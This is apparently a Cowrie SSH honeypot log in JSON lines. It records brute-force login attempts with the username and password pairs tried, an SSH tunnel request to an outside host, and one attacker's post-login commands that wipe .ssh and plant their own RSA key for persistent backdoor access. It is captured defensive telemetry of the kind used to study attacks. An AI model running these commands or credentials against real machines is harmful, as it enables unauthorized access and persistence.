{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:44:25.552897Z","src_ip":"212.227.235.229","session":"2f4d147f364c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:44:26.114130Z","src_ip":"212.227.235.229","session":"2f4d147f364c"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:26.244099Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:26.245763Z","src_ip":"212.227.235.229","session":"2f4d147f364c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:26.596876Z","src_ip":"134.199.174.250","session":"d41f2e5ae62b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40598,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc6ab848c187","protocol":"ssh","message":"New connection: 212.227.235.229:40598 (1.2.3.4:22) [session: fc6ab848c187]","sensor":"my-vps","timestamp":"2025-09-08T13:44:49.594832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:44:49.595775Z","src_ip":"212.227.235.229","session":"fc6ab848c187"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:44:49.822010Z","src_ip":"212.227.235.229","session":"fc6ab848c187"}
{"eventid":"cowrie.login.failed","username":"factory","password":"111","message":"login attempt [factory/111] failed","sensor":"my-vps","timestamp":"2025-09-08T13:44:50.767084Z","src_ip":"212.227.235.229","session":"fc6ab848c187"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:51.998810Z","src_ip":"212.227.235.229","session":"fc6ab848c187"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56886,"dst_ip":"1.2.3.4","dst_port":22,"session":"19605044787d","protocol":"ssh","message":"New connection: 134.199.174.250:56886 (1.2.3.4:22) [session: 19605044787d]","sensor":"my-vps","timestamp":"2025-09-08T13:44:53.782048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:44:53.795352Z","src_ip":"134.199.174.250","session":"19605044787d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:44:54.135879Z","src_ip":"134.199.174.250","session":"19605044787d"}
{"eventid":"cowrie.login.failed","username":"backup","password":"password1","message":"login attempt [backup/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:44:55.766327Z","src_ip":"134.199.174.250","session":"19605044787d"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:57.312344Z","src_ip":"134.199.174.250","session":"19605044787d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10850,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5bc0ee4514f","protocol":"ssh","message":"New connection: 212.227.235.229:10850 (1.2.3.4:22) [session: c5bc0ee4514f]","sensor":"my-vps","timestamp":"2025-09-08T13:45:07.262878Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:07.263948Z","src_ip":"212.227.235.229","session":"c5bc0ee4514f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11193,"dst_ip":"1.2.3.4","dst_port":22,"session":"b62ebd9c2d8e","protocol":"ssh","message":"New connection: 212.227.235.229:11193 (1.2.3.4:22) [session: b62ebd9c2d8e]","sensor":"my-vps","timestamp":"2025-09-08T13:45:07.364485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:45:07.365643Z","src_ip":"212.227.235.229","session":"b62ebd9c2d8e"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T13:45:07.493548Z","src_ip":"212.227.235.229","session":"b62ebd9c2d8e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:45:08.009168Z","src_ip":"212.227.235.229","session":"b62ebd9c2d8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T13:45:08.138725Z","session":"b62ebd9c2d8e"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":35491,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fc668261304","protocol":"ssh","message":"New connection: 49.247.35.31:35491 (1.2.3.4:22) [session: 0fc668261304]","sensor":"my-vps","timestamp":"2025-09-08T13:45:11.314034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:45:11.315666Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:45:11.598517Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.login.success","username":"root","password":"Z2x4c6v8","message":"login attempt [root/Z2x4c6v8] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:45:12.756957Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36256,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7feaa000797","protocol":"ssh","message":"New connection: 212.227.235.229:36256 (1.2.3.4:22) [session: d7feaa000797]","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.351327Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:45:13.400274Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.400959Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.402052Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.403455Z","src_ip":"212.227.235.229","session":"d7feaa000797"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.462848Z","src_ip":"212.227.235.229","session":"d7feaa000797"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.697935Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.login.failed","username":"client","password":"abc123","message":"login attempt [client/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:45:13.936686Z","src_ip":"212.227.235.229","session":"d7feaa000797"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:45:14.314079Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:45:14.314761Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:45:14.603798Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:14.604616Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":24432,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c8f845b73eb","protocol":"ssh","message":"New connection: 49.247.35.31:24432 (1.2.3.4:22) [session: 3c8f845b73eb]","sensor":"my-vps","timestamp":"2025-09-08T13:45:14.864213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:45:14.881108Z","src_ip":"49.247.35.31","session":"3c8f845b73eb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:15.042308Z","src_ip":"212.227.235.229","session":"d7feaa000797"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:45:15.154015Z","src_ip":"49.247.35.31","session":"3c8f845b73eb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:45:16.219926Z","src_ip":"49.247.35.31","session":"3c8f845b73eb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:17.499796Z","src_ip":"49.247.35.31","session":"3c8f845b73eb"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":9312,"dst_ip":"1.2.3.4","dst_port":22,"session":"159e376611bc","protocol":"ssh","message":"New connection: 49.247.35.31:9312 (1.2.3.4:22) [session: 159e376611bc]","sensor":"my-vps","timestamp":"2025-09-08T13:45:17.762106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:45:17.763184Z","src_ip":"49.247.35.31","session":"159e376611bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:45:18.040252Z","src_ip":"49.247.35.31","session":"159e376611bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:45:19.176560Z","src_ip":"49.247.35.31","session":"159e376611bc"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:19.444739Z","src_ip":"49.247.35.31","session":"0fc668261304"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:45:19.445889Z","src_ip":"49.247.35.31","session":"159e376611bc"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":42598,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e65603f581e","protocol":"ssh","message":"New connection: 134.199.174.250:42598 (1.2.3.4:22) [session: 6e65603f581e]","sensor":"my-vps","timestamp":"2025-09-08T13:45:22.823001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:45:22.902900Z","src_ip":"134.199.174.250","session":"6e65603f581e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp25